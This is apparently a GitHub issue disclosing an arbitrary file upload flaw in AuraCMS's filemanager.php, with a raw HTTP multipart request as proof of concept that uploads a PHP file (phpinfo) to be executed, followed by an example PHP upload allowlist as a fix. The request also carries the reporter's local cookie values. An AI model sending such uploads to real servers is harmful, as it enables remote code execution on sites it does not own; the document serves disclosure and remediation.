auracms / AuraCMS

Indonesia Content Management System
http://auracms.org

There is an arbitrary file upload vulnerability in filemanager.php #5

Open liao10086 opened 6 years ago

liao10086 commented 6 years ago

Hi, I found an arbitrary file upload vulnerability in filemanager.php.

1. When I add a file, I can add a PHP file.

2. Access the test.php.

POC:

```
POST /filemanager.php?field=onmouseoversrc&url= HTTP/1.1
Host: localhost
Content-Length: 512
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHKbCCaxrNdKm4nFp
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Referer: http://localhost/filemanager.php?field=onmouseoversrc&url=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1531379042; greencms_post_add1=x%9C%85%8FK%0B%C20%10%84%FF%8A%EC%C1S%C5%24%B4M%8D%E2%C5%83%27O%1E%8DH%1Fi%0D%D44%98%CDA%C4%FFnJ%7D%80%82%9E%96%99%FDf%97%B9%82%ED%1C%1EPc%AB%40%80%F4i%C1%98%F4Y%5D%2A%E9%E3%9A%D7%D2%F3%84e%EB%B3Rf%B5%D9B4%F0egP%19%0C%89%85%5D%8EM%E1%EC%7C%F4%7F%F4%17S%22%7D2%E3U%14%84%A2i%7F%3E.%7F%85%16rj%97%E1o%99%A3%03%B1%03%0A%FB%080o%DEbhp%B1%7D%01%A7M%13%9A%3CL%879%FA%00%82%F5E%AB%DD%F1%E9%A3%3A%D96%C7%EF%00v6x%E4%29%AB%81a%84f%13%C2%27%94%8Dh%22%E8L%D0%17q%EA%2A%5DkU%7DP%A9+%5C%C4%2FJ%F7%7B%0A%B7%3B%29%BCqm; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1532595699; tm=20e0109ed56458f613d642c25308ebcc; pfa_uuid=e0196bb6066655745cde036f563b8ed7; com.wibu.cm.webadmin.lang=zh-CN; UM_distinctid=1651900b111131-081d53427a68f9-3a614f0b-1aeaa0-1651900b1129bf; CNZZDATA5812519=cnzz_eid%3D697695792-1533722469-http%253A%252F%252Flocalhost%252F%26ntime%3D1533722469; theme=43605befe128722a18cc84a63288d33d836e74e8%7Edefault; authautologin=c882f8571804fee33e968c450ec495a4b884a998%7E8f05700f2b069bd5f06d67136091704a2168b821; sidebar_state=not-collapsed; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1534141480; PHPSESSID=3hqbdg26in79vo81tpqv9qo2s5; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1533538539,1534148242; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1534150276; Login=pl79357g4631s6p2e7333gut42; ui-tabs-1=1
Connection: close

------WebKitFormBoundaryHKbCCaxrNdKm4nFp
Content-Disposition: form-data; name="return"

files
------WebKitFormBoundaryHKbCCaxrNdKm4nFp
Content-Disposition: form-data; name="new_file"; filename="test.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryHKbCCaxrNdKm4nFp
Content-Disposition: form-data; name="new_resize"


------WebKitFormBoundaryHKbCCaxrNdKm4nFp
Content-Disposition: form-data; name="new_rotate"

0
------WebKitFormBoundaryHKbCCaxrNdKm4nFp--
```

Please limit the upload file type. I hope you can fix it.

Author: xijun.liao@dbappsecurity.com.cn
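One way to implement the file-type restriction requested in the report above, as an added example that is not AuraCMS code and not part of the original issue. It validates the `new_file` form field from the PoC request; the image-only allowlist, the `store_upload` helper name and the `files` target directory are assumptions, since the page does not show how filemanager.php stores uploads.

```php
<?php
// Added example, not AuraCMS code. Checks the "new_file" part seen in the PoC
// before anything is written to disk. Assumptions: image-only uploads, the
// allowlist below, and the hypothetical "files" target directory.
const ALLOWED_TYPES = [   // extension => MIME type expected from the content
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// $file is one $_FILES entry. Returns the stored name or throws.
function store_upload(array $file, string $destDir): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new RuntimeException('upload failed');
    }
    // Allowlist on the extension of the client-supplied name: test.php stops here.
    $ext = strtolower(pathinfo((string) ($file['name'] ?? ''), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException('file type not allowed');
    }
    // The client's Content-Type (application/octet-stream in the PoC) is ignored;
    // the type is taken from the file's bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: only the vetted extension from the request reaches the path.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, rtrim($destDir, '/') . '/' . $stored)) {
        throw new RuntimeException('could not store file');
    }
    return $stored;
}

// Hypothetical wiring inside the upload handler.
if (isset($_FILES['new_file'])) {
    try {
        echo 'stored as ' . store_upload($_FILES['new_file'], __DIR__ . '/files');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . $e->getMessage();
    }
}
```

Disabling script execution for the upload directory in the web server configuration is a separate control that this sketch does not set up.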